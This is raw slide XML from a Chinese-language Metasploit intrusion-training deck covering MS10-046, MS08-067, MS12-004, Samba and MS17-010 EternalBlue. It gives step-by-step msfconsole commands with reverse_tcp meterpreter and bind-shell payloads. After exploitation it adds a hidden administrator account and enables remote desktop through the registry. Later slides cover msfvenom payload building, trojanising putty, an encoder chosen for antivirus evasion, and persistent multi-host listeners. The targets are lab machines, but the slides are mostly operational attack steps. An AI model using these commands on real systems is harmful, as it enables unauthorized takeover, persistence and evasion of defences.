              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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Snagit_PPT9FE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0100"/>
            <a:ext cx="121920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8063"/>
            <a:ext cx="12192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98563"/>
            <a:ext cx="1184751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082675"/>
            <a:ext cx="12192000" cy="4525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1371600" lvl="3" indent="0" algn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0" algn="ctr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</a:rPr>
              <a:t>MS10-046 漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵实战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1650" y="174625"/>
            <a:ext cx="10972800" cy="6019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zh-CN" altLang="en-US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漏洞描述：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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快捷方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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文件自动执行代码漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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MS10-046</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4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 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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16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sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>受影响系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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MicrosoftWindowsXP SP3</a:t>
            </a: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MicrosoftWindows XP SP2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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WindowsVista SP2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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 Vista SP1</a:t>
            </a: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 Server 2008 R2</a:t>
            </a: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 Server 2003 SP2</a:t>
            </a:r>
            <a:b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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Microsoft Windows 7 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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14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5000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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支持使用快捷方式或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文件。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文件是指向本地文件的引用，点击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文件与点击快捷方式所指定的目标具有相同的效果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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5000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:b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b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没有正确地处理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文件，特制的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文件可能导致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自动执行快捷方式文件所指定的代码。这些代码可能位于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USB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驱动、本地或远程文件系统、光驱或其他位置，使用资源管理器查看了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LNK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文件所在位置就足以触发这个漏洞。默认下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启动了自动加载和自动播放功能，因此在连接可移动设备（如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USB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闪存）后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a: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会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。</a:t>
            </a:r>
            <a:b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b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</a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目前这个漏洞正在被广为利用传播恶意软件。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4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zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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zh-CN" altLang="en-US" sz="700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050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zh-CN" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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3085" y="864846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MSF基础知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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76770" y="2093720"/>
            <a:ext cx="10537380" cy="418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运行 msfconsole 即可打开msf命令控制接口。 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23" y="3448941"/>
            <a:ext cx="69056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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>受影响系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1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2400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11176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1582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11582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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph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84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11785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241418" y="102549"/>
            <a:ext cx="1727200" cy="46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zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRP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1988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711200" y="0"/>
            <a:ext cx="1727200" cy="463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zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRP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685800"/>
            <a:ext cx="11607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871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11074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73163"/>
            <a:ext cx="9347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3733800"/>
            <a:ext cx="9448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/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1082675"/>
            <a:ext cx="12192000" cy="45259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57505" indent="-357505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57505" indent="-357505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indent="0" algn="ctr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endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="0" algn="ctr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Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>MS0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>-0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>67</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t> 漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>入侵实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204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Snagit_PPT137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657225"/>
            <a:ext cx="10928350" cy="556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Snagit_PPTFF0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14438"/>
            <a:ext cx="84201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95995" y="2334649"/>
            <a:ext cx="3438525" cy="31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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>当打开msfconsole后，大家请看红色的方框。这里面清楚的标记了Metasploit所有的利用模块、payload等等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-C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21" y="2189719"/>
            <a:ext cx="5596442" cy="37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Snagit_PPT1EB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874713"/>
            <a:ext cx="8494713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501650" y="420053"/>
            <a:ext cx="8882063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/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>设置要使用的反弹负载插件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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6803" name="Snagit_PPTB49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12192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342900" y="481648"/>
            <a:ext cx="7156450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0000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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设置要监听的本地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ip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7827" name="Snagit_PPTB05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89050"/>
            <a:ext cx="121666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5650" y="950304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ms12-004</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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16950" y="2102265"/>
            <a:ext cx="7853585" cy="27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search ms12-004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show options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use exploit/windows/browser/ms12_004_midi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PAYLOAD windows/meterpreter/reverse_tcp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set LHOST 192.168.2.128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show targets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zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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8918" y="787934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Linux samba漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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10953" y="2230452"/>
            <a:ext cx="7033190" cy="287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search samba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use linux/samba/lsa_transnames_heap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show payloads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set payload linux/x86/shell_bind_tcp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set LPORT 8080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set RHOST 192.168.2.66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exploit   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zh-CN" alt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6129" y="770843"/>
            <a:ext cx="4678080" cy="7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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ms17-010</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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34815" y="1855268"/>
            <a:ext cx="8021178" cy="41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ms17-010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扫描模块，对靶机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Win7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进行扫描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使用模块 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msf &gt; use auxiliary/scanner/smb/smb_ms17_010 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设置目标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IP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或网段 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msf auxiliary(smb_ms17_010) &gt; set RHOSTS 172.16.70.199 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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</a:rPr>
              <a:t>执行扫描 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</a:rPr>
              <a:t>msf auxiliary(smb_ms17_010) &gt; run </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Ms17-010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使用模块 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>msf &gt; use exploit/windows/smb/ms17_010_eternalblue </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看可设置的选项 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>msf exploit(ms17_010_eternalblue) &gt; show options </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置***目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ip </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>msf exploit(ms17_010_eternalblue) &gt; set RHOST 172.16.70.199 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行*** </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>msf exploit(ms17_010_eternalblue) &gt; exploit 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Ms17-010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Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建用户名密码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cracer/123.com </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>net user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 123.com /add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加入管理组 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>net localgroup administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> /add </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启远程桌面功能 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程桌面连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Win7 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rdesktop 172.16.70.199:3389</a:t>
            </a:r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1664970" y="4050665"/>
            <a:ext cx="8407400" cy="571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58950" y="2031365"/>
            <a:ext cx="8468995" cy="1905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67810" y="2840355"/>
            <a:ext cx="562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Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>模块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msfvenom简介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msfvenom是msfpayload和msfencode的结合体，于2015年6月8日取代了msfpayload和msfencode。在此之后，metasploit-framework下面的的msfpayload（荷载生成器），msfencoder（编码器），msfcli（监听接口）都不再被支持。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>msfvenom所有参数</a:t>
            </a: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10" y="2778125"/>
            <a:ext cx="8880475" cy="3658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7642" y="659747"/>
            <a:ext cx="5806066" cy="61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zh-CN" dirty="0"/>
              <a:t>全部参数的解释和利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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239140" y="2384276"/>
            <a:ext cx="10375010" cy="38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dirty="0"/>
              <a:t>Help参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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68" y="2384277"/>
            <a:ext cx="5050448" cy="342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msfvenom简介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-x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>例如想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>putty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中捆绑恶意代码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常用参数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zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>比如想查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项，可以使用msfvenom -p windows/meterpreter/reverse_tcp --list-options</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>msfvenom --list payloads可查看所有payloads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msfvenom --list encoders可查看所有编码器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai，其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器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类似可用msfvenom --list命令查看的还有payloads, encoders, nops, platforms, archs, encrypt, formats</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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监听参数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防止假session 这里的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是指控制会话的意思 不是指网站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在实战中，经常会遇到假session或者刚连接就断开的情况，这里补充一些监听参数，防止假死与假session。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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf exploit(multi/handler) &gt; set ExitOnSession false    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果是假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动退出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>//可以在接收到seesion后继续监听端口，保持侦听。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防止session意外退出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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf5 exploit(multi/handler) &gt; set SessionCommunicationTimeout 0  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>//默认情况下，如果一个会话将在5分钟（300秒）没有任何活动，那么它会被杀死,为防止此情况可将此项修改为0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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msf5 exploit(multi/handler) &gt; set SessionExpirationTimeout 0 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>//默认情况下，一个星期（604800秒）后，会话将被强制关闭,修改为0可永久不会被关闭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069" y="0"/>
            <a:ext cx="8354695" cy="640080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>handler后台持续监听 控制多台主机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194" y="464025"/>
            <a:ext cx="10873541" cy="5350986"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>msf exploit(multi/handler) &gt; exploit -j -z</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用exploit -j -z可在后台持续监听,-j为后台任务，-z为持续监听，使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>也就是用于等待建立多个连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>建立监听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; use exploit/multi/handler </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>msf5 exploit(multi/handler) &gt; set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>还有种比较快捷的建立监听的方式，在msf下直接执行：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; handler -H 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>92.168.8.124</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1122</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> -p windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>只要有人和我建立连接，我就会和他建立回话</a:t>
            </a:r>
